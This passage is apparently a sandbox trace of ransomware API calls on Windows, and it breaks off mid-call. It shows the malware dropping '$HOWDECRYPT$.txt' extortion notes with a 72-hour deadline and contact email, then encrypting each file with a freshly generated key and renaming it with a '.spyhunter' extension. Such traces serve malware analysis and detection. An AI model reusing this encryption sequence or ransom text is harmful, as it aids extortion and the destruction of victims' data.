dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.407] WriteFile (in: hFile=0x9c, lpBuffer=0x25cef1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceedc, lpOverlapped=0x0 | out: lpBuffer=0x25cef1c*, lpNumberOfBytesWritten=0x25ceedc*=0x4, lpOverlapped=0x0) returned 1 [0145.409] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceedc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ceedc*=0x30, lpOverlapped=0x0) returned 1 [0145.409] CloseHandle (hObject=0x9c) returned 1 [0145.409] GetProcessHeap () returned 0x2c0000 [0145.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0145.409] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.spyhunter") returned 140 [0145.410] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.spyhunter" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab.spyhunter")) returned 1 [0145.410] GetProcessHeap () returned 0x2c0000 [0145.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0145.410] GetProcessHeap () returned 0x2c0000 [0145.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0145.410] GetProcessHeap () returned 0x2c0000 [0145.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc4bf8 | out: hHeap=0x2c0000) returned 1 [0145.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0145.411] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0145.411] WriteFile (in: hFile=0x9c, lpBuffer=0x25cee4f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cef78, lpOverlapped=0x0 | out: lpBuffer=0x25cee4f*, lpNumberOfBytesWritten=0x25cef78*=0x127, lpOverlapped=0x0) returned 1 [0145.412] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0145.412] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cef78, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cef78*=0x2ac, lpOverlapped=0x0) returned 1 [0145.412] CloseHandle (hObject=0x9c) returned 1 [0145.412] GetProcessHeap () returned 0x2c0000 [0145.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f695f0 | out: hHeap=0x2c0000) returned 1 [0145.412] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0145.413] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0145.413] WriteFile (in: hFile=0x9c, lpBuffer=0x25cee4b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cef74, lpOverlapped=0x0 | out: lpBuffer=0x25cee4b*, lpNumberOfBytesWritten=0x25cef74*=0x127, lpOverlapped=0x0) returned 1 [0145.413] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0145.413] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cef74, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cef74*=0x2ac, lpOverlapped=0x0) returned 1 [0145.413] CloseHandle (hObject=0x9c) returned 1 [0145.414] GetProcessHeap () returned 0x2c0000 [0145.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe9748 | out: hHeap=0x2c0000) returned 1 [0145.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0145.546] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0145.546] WriteFile (in: hFile=0xb0, lpBuffer=0x25cee47*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cef70, lpOverlapped=0x0 | out: lpBuffer=0x25cee47*, lpNumberOfBytesWritten=0x25cef70*=0x127, lpOverlapped=0x0) returned 1 [0145.546] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0145.547] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cef70, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cef70*=0x2ac, lpOverlapped=0x0) returned 1 [0145.547] CloseHandle (hObject=0xb0) returned 1 [0145.547] GetProcessHeap () returned 0x2c0000 [0145.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc4948 | out: hHeap=0x2c0000) returned 1 [0145.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.547] GetProcessHeap () returned 0x2c0000 [0145.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f628a8 | out: hHeap=0x2c0000) returned 1 [0145.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.547] GetProcessHeap () returned 0x2c0000 [0145.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f694d8 | out: hHeap=0x2c0000) returned 1 [0145.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.547] GetProcessHeap () returned 0x2c0000 [0145.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffa5f8 | out: hHeap=0x2c0000) returned 1 [0145.548] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.548] GetProcessHeap () returned 0x2c0000 [0145.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe9610 | out: hHeap=0x2c0000) returned 1 [0145.548] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.548] GetProcessHeap () returned 0x2c0000 [0145.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f627a0 | out: hHeap=0x2c0000) returned 1 [0145.548] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.548] GetProcessHeap () returned 0x2c0000 [0145.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f693c0 | out: hHeap=0x2c0000) returned 1 [0145.548] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.548] GetProcessHeap () returned 0x2c0000 [0145.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffa4d0 | out: hHeap=0x2c0000) returned 1 [0145.548] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.549] GetProcessHeap () returned 0x2c0000 [0145.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe88a8 | out: hHeap=0x2c0000) returned 1 [0145.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Oracle\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\oracle\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.549] GetProcessHeap () returned 0x2c0000 [0145.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33eb90 | out: hHeap=0x2c0000) returned 1 [0145.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Mozilla\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\mozilla\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.549] GetProcessHeap () returned 0x2c0000 [0145.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33eae8 | out: hHeap=0x2c0000) returned 1 [0145.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\mozilla\\logs\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.549] GetProcessHeap () returned 0x2c0000 [0145.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffc198 | out: hHeap=0x2c0000) returned 1 [0145.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft help\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.549] GetProcessHeap () returned 0x2c0000 [0145.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffc0e0 | out: hHeap=0x2c0000) returned 1 [0145.549] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceee0 | out: pbBuffer=0x25ceee0) returned 1 [0145.550] GetProcessHeap () returned 0x2c0000 [0145.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0145.550] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ceed8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ceed8*=0x30) returned 1 [0145.550] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0145.550] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn") returned 61 [0145.550] StrStrW (lpFirst="MS.MSACCESS.14.1033.hxn", lpSrch=".txt") returned 0x0 [0145.550] GetProcessHeap () returned 0x2c0000 [0145.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0145.550] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cee9c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cee9c*=0x158, lpOverlapped=0x0) returned 1 [0145.551] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffea8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.551] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x25cee9c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cee9c*=0x158, lpOverlapped=0x0) returned 1 [0145.551] GetProcessHeap () returned 0x2c0000 [0145.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0145.551] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.551] WriteFile (in: hFile=0xb0, lpBuffer=0x25ceedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cee9c, lpOverlapped=0x0 | out: lpBuffer=0x25ceedc*, lpNumberOfBytesWritten=0x25cee9c*=0x4, lpOverlapped=0x0) returned 1 [0145.551] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cee9c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cee9c*=0x30, lpOverlapped=0x0) returned 1 [0145.551] CloseHandle (hObject=0xb0) returned 1 [0145.552] GetProcessHeap () returned 0x2c0000 [0145.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0145.552] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.spyhunter") returned 71 [0145.552] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.spyhunter" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn.spyhunter")) returned 1 [0145.552] GetProcessHeap () returned 0x2c0000 [0145.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0145.552] GetProcessHeap () returned 0x2c0000 [0145.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0145.552] GetProcessHeap () returned 0x2c0000 [0145.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3030b78 | out: hHeap=0x2c0000) returned 1 [0145.553] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceed8 | out: pbBuffer=0x25ceed8) returned 1 [0145.553] GetProcessHeap () returned 0x2c0000 [0145.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0145.553] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ceed0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ceed0*=0x30) returned 1 [0145.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0145.553] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn") returned 67 [0145.553] StrStrW (lpFirst="MS.INFOPATHEDITOR.14.1033.hxn", lpSrch=".txt") returned 0x0 [0145.553] GetProcessHeap () returned 0x2c0000 [0145.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0145.553] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cee94, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cee94*=0x17c, lpOverlapped=0x0) returned 1 [0145.554] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe84, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.554] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x25cee94, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cee94*=0x17c, lpOverlapped=0x0) returned 1 [0145.554] GetProcessHeap () returned 0x2c0000 [0145.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0145.554] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.554] WriteFile (in: hFile=0xb0, lpBuffer=0x25ceed4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cee94, lpOverlapped=0x0 | out: lpBuffer=0x25ceed4*, lpNumberOfBytesWritten=0x25cee94*=0x4, lpOverlapped=0x0) returned 1 [0145.554] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cee94, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cee94*=0x30, lpOverlapped=0x0) returned 1 [0145.554] CloseHandle (hObject=0xb0) returned 1 [0145.555] GetProcessHeap () returned 0x2c0000 [0145.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0145.555] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.spyhunter") returned 77 [0145.555] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.spyhunter" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn.spyhunter")) returned 1 [0145.555] GetProcessHeap () returned 0x2c0000 [0145.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0145.555] GetProcessHeap () returned 0x2c0000 [0145.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0145.555] GetProcessHeap () returned 0x2c0000 [0145.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef72f8 | out: hHeap=0x2c0000) returned 1 [0145.555] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceed8 | out: pbBuffer=0x25ceed8) returned 1 [0145.555] GetProcessHeap () returned 0x2c0000 [0145.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0145.556] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ceed0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ceed0*=0x30) returned 1 [0145.556] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft 